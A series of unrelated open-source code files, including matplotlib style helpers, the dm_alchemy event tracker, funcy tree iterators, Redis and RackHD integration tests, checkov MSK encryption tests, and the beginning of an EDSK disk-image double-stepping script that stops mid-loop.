"lines.linewidth": line_base_ratio * base_width,
"xtick.major.width": tick_major_width,
"ytick.major.width": tick_major_width,
"xtick.minor.width": tick_minor_width,
"ytick.minor.width": tick_minor_width,
"xtick.major.size": tick_major_size,
"ytick.major.size": tick_major_size,
"xtick.minor.size": tick_minor_size,
"ytick.minor.size": tick_minor_size,
"grid.linewidth": base_width,
# Legend frame linewidth
"patch.linewidth": base_width,
"legend.edgecolor": "inherit", # inherit color from axes. passing 'color' leads to awkward future warnings.
# Control the zorder of the ticks and gridlines
# This is somewhat out of place in this function, but creating a new function
# seems a bit unnecessary here... suggestions welcome!
"axes.axisbelow": axisbelow,
}
def grid(*, grid_alpha=0.2, grid_linestyle="solid"):
"""Adjust the grid-style."""
return {
# Update the linestyle of the grid
# (it shares a color with the frame, and needs to be distinguishable)
"grid.linestyle": grid_linestyle,
"grid.alpha": grid_alpha,
}
def legend(*, shadow=False, frameon=True, fancybox=False):
"""Adjust the legend-style."""
return {
"legend.shadow": shadow,
"legend.frameon": frameon,
"legend.fancybox": fancybox,
}
def color(*, base="black", face="none"):
"""Adjust the axes' color."""
return {
"text.color": base,
"axes.edgecolor": base,
"axes.labelcolor": base,
"xtick.color": base,
"ytick.color": base,
"grid.color": base,
"axes.facecolor": face,
}
def spines(*, left=True, right=True, top=True, bottom=True):
"""Adjust the visibility of the axes' spines."""
return {
"axes.spines.left": left,
"axes.spines.right": right,
"axes.spines.top": top,
"axes.spines.bottom": bottom,
}
def tick_direction(*, x="inout", y="inout"):
"""Adjust the tick direction."""
return {
"xtick.direction": x,
"ytick.direction": y,
}
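# These helpers return plain matplotlib rcParams dictionaries; a typical
# (illustrative) way to apply them is to merge them into plt.rcParams.
import matplotlib.pyplot as plt

plt.rcParams.update({**lines(base_width=0.6), **grid(), **legend(), **color(base="0.2")})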
|
dm_alchemy/event_tracker.py
|
locross93/dm_alchemy
| 182 |
87948
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tracks the order of alchemy events and resulting stones and potions."""
import abc
import collections
import copy
import itertools
import random
from typing import Any, Dict, List, Mapping, Optional, Sequence, Set, Tuple, Union
from dm_alchemy.types import graphs
from dm_alchemy.types import stones_and_potions
from dm_alchemy.types import utils
import numpy as np
Stone = stones_and_potions.Stone
Potion = stones_and_potions.Potion
LatentStone = stones_and_potions.LatentStone
LatentPotion = stones_and_potions.LatentPotion
AlignedStone = stones_and_potions.AlignedStone
PerceivedPotion = stones_and_potions.PerceivedPotion
StoneMap = stones_and_potions.StoneMap
PotionMap = stones_and_potions.PotionMap
CAULDRON = stones_and_potions.CAULDRON
RewardWeights = stones_and_potions.RewardWeights
Graph = graphs.Graph
NEVER_USED = -1
NO_OUTCOME = -1
UNKNOWN_TYPE = -3
class EventTracker(abc.ABC):
"""Base class for things that track alchemy events."""
def __init__(self, name):
self.name = name
@abc.abstractmethod
def potion_used(
self, stone_ind: int, potion_ind: int, val: int, start_stone: graphs.Node,
stone_inst: int, potion: Potion, end_stone: graphs.Node) -> None:
pass
def failed_potion_use(
self, stone_ind: int, start_stone: graphs.Node, stone_inst: int) -> None:
"""Optional callback when a potion use is attempted but fails."""
pass
class GameState:
"""Keeps track of the symbolic state of an alchemy game."""
def __init__(
self, graph: graphs.Graph, trial_items: utils.TrialItems,
event_trackers: Optional[Sequence[EventTracker]] = None
):
self._stones = copy.deepcopy(trial_items.stones)
self._stone_idx_to_ind = {p.idx: i for i, p in enumerate(self._stones)}
self._stone_ind_to_idx = {i: p.idx for i, p in enumerate(self._stones)}
self._potions = copy.deepcopy(trial_items.potions)
self._potion_idx_to_ind = {p.idx: i for i, p in enumerate(self._potions)}
self._graph = graph
num_stones = len(self._stones)
num_potions = len(self._potions)
self._existing_stones = set(range(num_stones))
self._existing_potions = set(range(num_potions))
trackers = event_trackers if event_trackers is not None else []
self.trackers = {tracker.name: tracker for tracker in trackers}
self._count = 0
def add_event_trackers(self, event_trackers: Sequence[EventTracker]) -> None:
"""Adds event trackers if they are not already there."""
self.trackers.update({tracker.name: tracker for tracker in event_trackers})
def get_stone_ind(
self, stone_inst: Optional[int] = None,
stone: Optional[Union[graphs.Node, LatentStone]] = None
) -> Optional[int]:
"""Gets a stone referred to through a variety of methods.
The caller must pass exactly one of stone_inst and stone.
Args:
stone_inst: The instance id of the stone used in the potion.
stone: The stone used.
Returns:
The index (into the list of stones originally passed to the EventTracker
in construction) for the stone used in the potion or None if no match can
be found.
"""
if len([e for e in [stone_inst, stone] if e is not None]) != 1:
raise ValueError('Exactly one of stone inst and stone must be given.')
if stone_inst is not None:
return self._stone_idx_to_ind[stone_inst]
if isinstance(stone, LatentStone):
stone_node = graphs.Node(-1, stone.latent_coords)
else:
stone_node = stone
matches = self._matching_stones(stone_node)
if not matches:
return None
return matches[0]
def get_potion_ind(
self, potion_inst: Optional[int] = None,
potion: Optional[Union[Potion, LatentPotion]] = None) -> Optional[int]:
"""Gets a potion referred to through a variety of methods.
The caller must pass exactly one of potion_inst and potion.
Args:
potion_inst: The instance id of the potion used.
potion: The potion used.
Returns:
The index (into the list of potions originally passed to the EventTracker
in construction) for the potion used or None if no match can be found.
-1 refers to the cauldron.
"""
if len([e for e in [potion_inst, potion] if e is not None]) != 1:
raise ValueError('Exactly one of potion inst and potion must be given.')
if potion_inst is not None:
return self._potion_idx_to_ind[potion_inst]
if isinstance(potion, LatentPotion):
potion = Potion(-1, potion.latent_dim, potion.latent_dir)
matches = self._matching_potions(potion)
if not matches:
return None
return matches[0]
def _stone_node(self, ind: int) -> graphs.Node:
node_ = self._graph.node_list.get_node_by_coords(
list(self._stones[ind].latent))
assert node_ is not None
node: graphs.Node = node_
return node
def _matching_potions(self, potion: Potion) -> List[int]:
return [p for p in self._existing_potions
if self._potions[p].as_index == potion.as_index]
def _matching_stones(self, stone_node: graphs.Node) -> List[int]:
return [i for i in self._existing_stones
if tuple(self._stone_node(i).coords) == tuple(stone_node.coords)]
def has_stone_ind(self, stone_ind: int) -> bool:
return stone_ind in self._existing_stones
def has_potion_ind(self, potion_ind: int) -> bool:
return potion_ind in self._existing_potions
def _remove_potion(self, potion_ind: int) -> None:
self._existing_potions.remove(potion_ind)
def _remove_stone(self, stone_ind: int) -> None:
self._existing_stones.remove(stone_ind)
def potion_used(
self, stone_ind: int, potion_ind: int,
val: Optional[int] = None
) -> int:
"""Records that a potion has been used.
    The caller must pass valid stone_ind and potion_ind values.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
Returns:
The index (into the list of stones originally passed to the EventTracker
      in construction) for the stone used in the potion.
"""
# -1 corresponds to the cauldron and so there is no potion to remove and the
# stone does not change
old_node = self._stone_node(stone_ind)
outcome_stone = None
potion = None
if potion_ind != CAULDRON:
outcome_stone = copy.deepcopy(old_node)
potion = self._potions[potion_ind]
# Change the stone in _stones
if old_node in self._graph.edge_list.edges:
outcome_stone = [end_node for end_node, v in
self._graph.edge_list.edges[old_node].items()
if potion.same_effect(v[1])]
if outcome_stone:
assert len(outcome_stone) == 1
outcome_stone = outcome_stone[0]
self._stones[stone_ind].latent = np.array(list(outcome_stone.coords))
else:
outcome_stone = old_node
self._remove_potion(potion_ind)
if self.trackers:
if val is None:
val = self._count
self._count += 1
for event_tracker in self.trackers.values():
event_tracker.potion_used(
stone_ind, potion_ind, val, old_node,
self._stone_ind_to_idx[stone_ind], potion, outcome_stone)
return stone_ind
def stone_used(self, stone_ind: int, val: Optional[int] = None) -> None:
"""Records that a stone has been used (placed in the cauldron).
    The caller must pass a valid stone_ind.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
"""
self.potion_used(
stone_ind=stone_ind, potion_ind=CAULDRON, val=val)
self._remove_stone(stone_ind)
def failed_potion_use(self, stone_ind: int) -> None:
old_node = self._stone_node(stone_ind)
for event_tracker in self.trackers.values():
event_tracker.failed_potion_use(
stone_ind, old_node, self._stone_ind_to_idx[stone_ind])
def has_stones(self) -> bool:
return bool(self._existing_stones)
def has_potions(self) -> bool:
return bool(self._existing_potions)
def has_stones_and_potions(self) -> bool:
return self.has_stones() and self.has_potions()
  def rand_stone_ind(self) -> int:
    return random.choice(list(self._existing_stones))
  def rand_potion_ind(self) -> int:
    return random.choice(list(self._existing_potions))
def use_rand_stone_potion_pair(self) -> Tuple[Stone, int]:
"""Uses a random stone with a random potion.
Returns:
The new value of the stone and the index of that stone.
"""
stone_index = self.rand_stone_ind()
return self.use_rand_potion(stone_index)
def use_rand_potion(self, stone_ind: int) -> Tuple[Stone, int]:
"""Uses the stone passed with a random potion.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone to use in a random potion.
Returns:
The new value of the stone and the index of that stone.
"""
potion_index = self.rand_potion_ind()
self.potion_used(stone_ind, potion_index)
return self._stones[stone_ind], stone_ind
def existing_stone_nodes(self) -> List[graphs.Node]:
"""Returns a list of nodes for the remaining existing stones."""
return [self._stone_node(i) for i in self._existing_stones]
def existing_stones(self) -> List[Stone]:
"""Returns a list of the remaining existing stones."""
return [self._stones[i] for i in self._existing_stones]
def existing_potions(self) -> List[Potion]:
"""Returns a list of the remaining existing potions."""
return [self._potions[i] for i in self._existing_potions]
def existing_items(self) -> utils.TrialItems:
return utils.TrialItems(
stones=self.existing_stones(), potions=self.existing_potions())
@property
def num_stones(self) -> int:
return len(self._existing_stones)
@property
def num_potions(self) -> int:
return len(self._existing_potions)
def check_have_potions(self, needed_potions: Sequence[Potion]) -> bool:
"""Checks that we have all the potions we need."""
need = collections.Counter([p.as_index for p in needed_potions])
have = collections.Counter([self._potions[p].as_index
for p in self._existing_potions])
for k in need.keys():
if k not in have.keys():
return False
else:
if have[k] < need[k]:
return False
return True
def get_stones_above_thresh(
self, reward_weights: RewardWeights, threshold: int) -> List[int]:
"""Gets all the stones whose value exceeds the threshold passed in."""
current_vals = {i: reward_weights(self._stones[i].latent)
for i in self._existing_stones}
return [i for i, current_val in current_vals.items()
if current_val > threshold]
def use_stones_above_thresh(
self, reward_weights: RewardWeights, threshold: int) -> None:
"""Uses all the stones whose value exceeds the threshold passed in."""
for i in self.get_stones_above_thresh(reward_weights, threshold):
self.stone_used(i)
def get_stone(self, ind: int) -> Stone:
return self._stones[ind]
def get_potion(self, ind: int) -> Potion:
return self._potions[ind]
@property
def node_list(self) -> graphs.NodeList:
return self._graph.node_list
@property
def edge_list(self) -> graphs.EdgeList:
return self._graph.edge_list
@property
def stone_ind_to_idx(self) -> Dict[int, int]:
return self._stone_ind_to_idx
@property
def stone_idx_to_ind(self) -> Dict[int, int]:
return self._stone_idx_to_ind
@property
def potion_idx_to_ind(self) -> Dict[int, int]:
return self._potion_idx_to_ind
class TrialTracker(EventTracker):
"""Type which tracks all events in a trial."""
@abc.abstractmethod
def events_list(self) -> List[Tuple[int, int, int]]:
"""Returns a list of stone index, potion index, val for the trial events."""
pass
class MatrixEventTracker(TrialTracker):
"""Tracks the order of potion used and stone used events in matrix."""
def __init__(self, num_stones: int, num_potions: int):
self.events = np.full(
        shape=(num_stones, num_potions + 1), fill_value=-1, dtype=int)
super().__init__(name='matrix_event')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Records that a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
self.events[stone_ind, potion_ind] = val
def events_list(self) -> List[Tuple[int, int, int]]:
stone_used, potion_used = np.where(self.events != -1)
frame = [self.events[x, y] for (x, y) in zip(stone_used, potion_used)]
num_potions = self.events.shape[1] - 1
events = sorted(zip(stone_used, potion_used, frame), key=lambda x: x[2])
return [
(stone_ind, CAULDRON if potion_ind == num_potions else potion_ind,
frame) for stone_ind, potion_ind, frame in events]
ActionSequenceElement = Tuple[int, Mapping[str, Any], int, int]
class ActionSequenceTracker(TrialTracker):
"""Tracks the order of potion used and stone used events in matrix."""
def __init__(self):
self._action_sequence = []
super().__init__(name='action_sequence')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Records that a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
# add to action sequence
action_dict = {'node': (start_stone.idx, start_stone.coords),
'stone_idx': stone_inst}
# -1 corresponds to the cauldron and so there is no potion to remove and the
# stone does not change
if potion_ind == CAULDRON:
action_dict['action'] = 'cauldron'
else:
# Change the stone in _stones
action_dict['action'] = (potion.as_index,
(potion.dimension, potion.direction))
action_dict['potion_idx'] = potion.idx
action_dict['outcome_node'] = (end_stone.idx, end_stone.coords)
self._action_sequence.append((val, action_dict, stone_ind, potion_ind))
@property
def action_sequence(self) -> List[Tuple[int, Dict[str, Any], int, int]]:
self._action_sequence.sort(key=lambda x: x[0])
return self._action_sequence
def events_list(self) -> List[Tuple[int, int, int]]:
return [(stone_ind, potion_ind, val)
for val, _, stone_ind, potion_ind in self.action_sequence]
class LatestOutcomeTracker(EventTracker):
"""Tracks the most recent outcome of using a potion."""
def __init__(
self, potion_map: PotionMap, stone_map: StoneMap, rotation: np.ndarray):
    # None means no outcome or action has been recorded yet.
    self.outcome = None
self.type_based_action = None
self._potion_map, self._stone_map = potion_map, stone_map
self._rotation = rotation
super().__init__(name='latest_outcome')
def reset(self) -> None:
self.outcome = None
self.type_based_action = None
def _perceived_stone(self, stone: graphs.Node):
aligned_stone = self._stone_map.apply_inverse(LatentStone(np.array(
stone.coords)))
return stones_and_potions.unalign(aligned_stone, self._rotation)
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: Optional[graphs.Node]) -> None:
if end_stone is not None:
aligned_stone = self._stone_map.apply_inverse(LatentStone(np.array(
end_stone.coords)))
self.outcome = stones_and_potions.unalign(aligned_stone, self._rotation)
perceived_stone = self._perceived_stone(start_stone)
if potion_ind == CAULDRON:
self.type_based_action = utils.TypeBasedAction(
stone=perceived_stone, cauldron=True)
else:
perceived_potion = self._potion_map.apply_inverse(LatentPotion(
potion.dimension, potion.direction))
self.type_based_action = utils.TypeBasedAction(
stone=perceived_stone, potion=perceived_potion)
def failed_potion_use(
self, stone_ind: int, start_stone: graphs.Node, stone_inst: int):
"""Optional callback when a potion use is attempted but fails."""
self.outcome = None
perceived_stone = self._perceived_stone(start_stone)
# This is an invalid action but the stone type can be used for
# visualization.
self.type_based_action = utils.TypeBasedAction(stone=perceived_stone)
class RewardTracker(EventTracker):
"""Tracks the reward obtained."""
def __init__(self, reward_weights: RewardWeights):
self._reward = 0
self._reward_weights = reward_weights
super().__init__(name='reward')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Adds reward when a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
if potion_ind == CAULDRON:
self._reward += self._reward_weights(start_stone.coords)
@property
def reward(self) -> int:
return self._reward
class ItemsUsedTracker(EventTracker):
"""Tracks the stones and potions used."""
def __init__(self):
self.potions_used = []
self.stones_used = []
super().__init__(name='items_used')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Keeps lists of potions and stones which have been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). This is not relevant for this tracker.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
if potion_ind == CAULDRON:
self.stones_used.append(stone_ind)
else:
self.potions_used.append(potion_ind)
@property
def num_potions_used(self) -> int:
return len(self.potions_used)
@property
def num_stones_used(self) -> int:
return len(self.stones_used)
class Event(abc.ABC):
"""Abstract base class for events we want to check in the event tracker."""
@abc.abstractmethod
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
pass
def occurs(self, events: np.ndarray) -> bool:
event_start, _, _ = self.next_occurrence(events)
not_occurred = event_start == NEVER_USED
return not not_occurred
class SingleEvent(Event):
"""A single event where a stone is used with one of a set of potions."""
def __init__(self, stone_ind: int, potion_inds: Set[int]):
self.stone_ind = stone_ind
self.potion_inds = potion_inds
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
frames_potions = [(events[self.stone_ind, p], p) for p in self.potion_inds
if events[self.stone_ind, p] >= 0]
if not frames_potions:
return NEVER_USED, NEVER_USED, None
frame, potion_used = min(frames_potions, key=lambda v: v[0])
return frame, frame, {potion_used}
class AnyOrderEvents(Event):
"""A set of events which can happen in any order."""
def __init__(self, set_events: Set[Event]):
self.set_events = set_events
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
results = [e.next_occurrence(events) for e in self.set_events]
if any(v[0] == NEVER_USED for v in results):
return NEVER_USED, NEVER_USED, None
return (min(v[0] for v in results), max(v[1] for v in results),
set(itertools.chain.from_iterable([v[2] for v in results])))
class OrderedEvents(Event):
"""A list of events which must happen in the order passed in."""
def __init__(self, iter_events: Sequence[Event]):
self.iter_events = iter_events
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
results = [e.next_occurrence(events) for e in self.iter_events]
if any(v[0] == NEVER_USED for v in results):
return NEVER_USED, NEVER_USED, None
for end_first, start_next in zip([v[1] for v in results[:-1]],
[v[0] for v in results[1:]]):
# If the events happen on the same step this is allowed.
if end_first > start_next:
return NEVER_USED, NEVER_USED, None
return (results[0][0], results[-1][1],
set(itertools.chain.from_iterable([v[2] for v in results])))
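# Illustrative check of the event helpers on a hand-built matrix (2 stones,
# 2 potions plus the trailing cauldron column; -1 means "never happened").
_example_events = np.array([
    [0, -1, 3],    # stone 0: potion 0 at t=0, cauldron at t=3
    [-1, 2, -1],   # stone 1: potion 1 at t=2
])
_single = SingleEvent(stone_ind=0, potion_inds={0, 1})                # earliest use is t=0 via potion 0
_ordered = OrderedEvents([SingleEvent(0, {0}), SingleEvent(1, {1})])  # t=0 precedes t=2
assert _single.occurs(_example_events) and _ordered.occurs(_example_events)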
def replay_events(game_state: GameState, event_tracker: TrialTracker) -> None:
for stone_ind, potion_ind, val in event_tracker.events_list():
if potion_ind == CAULDRON:
game_state.stone_used(stone_ind=stone_ind, val=val)
else:
game_state.potion_used(
stone_ind=stone_ind, potion_ind=potion_ind, val=val)
def matrix_events_to_action_sequence(
graph: Graph, items: utils.TrialItems, matrix_events: MatrixEventTracker
) -> List[ActionSequenceElement]:
"""Takes events/output of evaluation analysis and creates an event tracker."""
action_sequence_tracker = ActionSequenceTracker()
game_state = GameState(
trial_items=items, graph=graph, event_trackers=[action_sequence_tracker])
if matrix_events.events.shape != (items.num_stones, items.num_potions + 1):
raise ValueError(
'Matrix of events shape does not match the number of stones and '
'potions present.')
replay_events(game_state, matrix_events)
return action_sequence_tracker.action_sequence
|
funcy/tree.py
|
ruancomelli/funcy
| 1,914 |
87964
|
from collections import deque
from .types import is_seqcont
__all__ = ['tree_leaves', 'ltree_leaves', 'tree_nodes', 'ltree_nodes']
def tree_leaves(root, follow=is_seqcont, children=iter):
"""Iterates over tree leaves."""
q = deque([[root]])
while q:
node_iter = iter(q.pop())
for sub in node_iter:
if follow(sub):
q.append(node_iter)
q.append(children(sub))
break
else:
yield sub
def ltree_leaves(root, follow=is_seqcont, children=iter):
"""Lists tree leaves."""
return list(tree_leaves(root, follow, children))
def tree_nodes(root, follow=is_seqcont, children=iter):
"""Iterates over all tree nodes."""
q = deque([[root]])
while q:
node_iter = iter(q.pop())
for sub in node_iter:
yield sub
if follow(sub):
q.append(node_iter)
q.append(children(sub))
break
def ltree_nodes(root, follow=is_seqcont, children=iter):
"""Lists all tree nodes."""
return list(tree_nodes(root, follow, children))
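# Small illustrative example: with the default is_seqcont predicate, nested
# lists are branches and everything else is a leaf.
nested = [1, [2, [3, 4]], 5]
print(ltree_leaves(nested))  # [1, 2, 3, 4, 5]
print(ltree_nodes(nested))   # [[1, [2, [3, 4]], 5], 1, [2, [3, 4]], 2, [3, 4], 3, 4, 5]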
|
integration_test/test_denyoom.py
|
lynix94/nbase-arc
| 176 |
87979
|
#
# Copyright 2015 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import testbase
import util
import redis_sock
import config
import default_cluster
# NOTE
# oom state persistence test is done by hand (hard to automate in this test framework)
#
class TestDenyOOM( unittest.TestCase ):
cluster = config.clusters[0]
leader_cm = config.clusters[0]['servers'][0]
@classmethod
def setUpClass(cls):
cls.conf_checker = default_cluster.initialize_starting_up_smr_before_redis( cls.cluster )
assert cls.conf_checker != None, 'failed to initialize cluster'
@classmethod
def tearDownClass( cls ):
testbase.defaultTearDown(cls)
def setUp( self ):
util.set_process_logfile_prefix( 'TestDenyOOM_%s' % self._testMethodName )
server = self.cluster['servers'][0]
self.redis = redis_sock.RedisClient(server['ip'], server['redis_port'])
def tearDown( self ):
if self.redis != None:
self.redis.close()
return 0
def check_oom(self, is_oom = False):
m,s1,s2 = util.get_mss(self.cluster)
mr = redis_sock.RedisClient(m['ip'], m['redis_port'])
sr = redis_sock.RedisClient(s1['ip'], s1['redis_port'])
try:
ok, data = mr.do_request("get nosuchkey_check_oom\r\n")
assert(ok), ok
ok, data = sr.do_request("get nosuchkey_check_oom\r\n")
assert(ok), ok
expected_ok = not is_oom
ok, data = mr.do_request("set nosuchkey_check_oom 100\r\n")
assert(ok == expected_ok), (ok, data)
ok, data = sr.do_request("set nosuchkey_check_oom 100\r\n")
assert(ok == expected_ok), (ok, data)
finally:
if mr != None:
mr.close()
if sr != None:
sr.close()
def test_basic ( self ):
util.print_frame()
redis = self.redis
# set oom
ok, resp = redis.do_request('deny-oom 1\r\n')
assert(resp == 'OK'), resp
self.check_oom(True)
# reset oom
ok, resp = redis.do_request('deny-oom 0\r\n')
assert(resp == 'OK'), resp
self.check_oom(False)
|
test/tests/rackhd20/test_rackhd20_api_schemas.py
|
arunrordell/RackHD
| 451 |
87980
|
'''
Copyright 2016, EMC, Inc.
Author(s):
<NAME>
'''
import fit_path # NOQA: unused import
import os
import sys
import subprocess
import fit_common
# Select test group here using @attr
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
class rackhd20_api_schemas(fit_common.unittest.TestCase):
def test_api_20_schemas(self):
api_data = fit_common.rackhdapi("/api/2.0/schemas")
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
        for item in api_data['json']:
            item_data = fit_common.rackhdapi(item)
            self.assertEqual(item_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(item_data['status']))
if __name__ == '__main__':
fit_common.unittest.main()
|
tests/terraform/checks/resource/aws/test_MSKClusterEncryption.py
|
antonblr/checkov
| 4,013 |
87988
|
import unittest
from checkov.common.models.enums import CheckResult
from checkov.terraform.checks.resource.aws.MSKClusterEncryption import check
class TestMSKClusterEncryption(unittest.TestCase):
def test_failure(self):
resource_conf = {
"name": "test-project",
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_non_tls(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": "aws_kms_key.kms.arn",
"encryption_in_transit": [
{
"client_broker": ["PLAINTEXT"],
"in_cluster": ["true"],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_in_cluster(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": [False],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": ["true"],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success_no_encrypt_block(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
# Regression test for https://github.com/bridgecrewio/checkov/issues/747
def test_success_no_encryption_at_rest_kms_key_arn_specified(self):
resource_conf = {
"name": "test-project",
"encryption_info": [{}],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
# Regression test for https://github.com/bridgecrewio/checkov/issues/747
def test_success_encryption_in_transit_and_no_encryption_at_rest_kms_key_arn_specified(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": [True],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
|
scripts/edsk_double_step.py
|
Bytedecode72/flashfloppy
| 847 |
88017
|
# edsk_double_step.py
#
# Create a double-step EDSK image by doubling up cylinders.
#
# Written & released by <NAME> <<EMAIL>>
#
# This is free and unencumbered software released into the public domain.
# See the file COPYING for more details, or visit <http://unlicense.org>.
import struct, sys, random
def main(argv):
if len(argv) != 3:
print("%s <input_file> <output_file>" % argv[0])
return
in_f = open(argv[1], "rb")
in_dat = in_f.read()
out = bytearray(in_dat[:256])
# Check image size
if len(in_dat) < 2048:
print("Not a valid EDSK image - Too short")
return
# Check image header
sig, _, tracks, sides, tsz = struct.unpack("<34s14sBBH", in_dat[:52])
out[48] = tracks * 2 # double up on number of cyls
tszs = in_dat[52:256]
in_dat = in_dat[256:]
if sig.startswith(b"MV - CPCEMU"):
for i in range(tracks):
out += in_dat[:tsz*sides]
for j in range(sides):
out[16-tsz*(j+1)] = i*2 # fix cyl#
out += in_dat[:tsz*sides]
for j in range(sides):
out[16-tsz*(j+1)] = i*2+1 # fix cyl#
in_dat = in_dat[tsz*sides:]
elif sig.startswith(b"EXTENDED CPC DSK File\r\nDisk-Info\r\n"):
for i in range(tracks):
for j in range(2):
off = 0
for k in range(sides):
tsz = tszs[k]*256
out += in_dat[off:off+tsz]
out[16-tsz] = i*2+j # fix cyl#
out[52+(i*2+j)*sides+k] = tszs[k] # fix track size
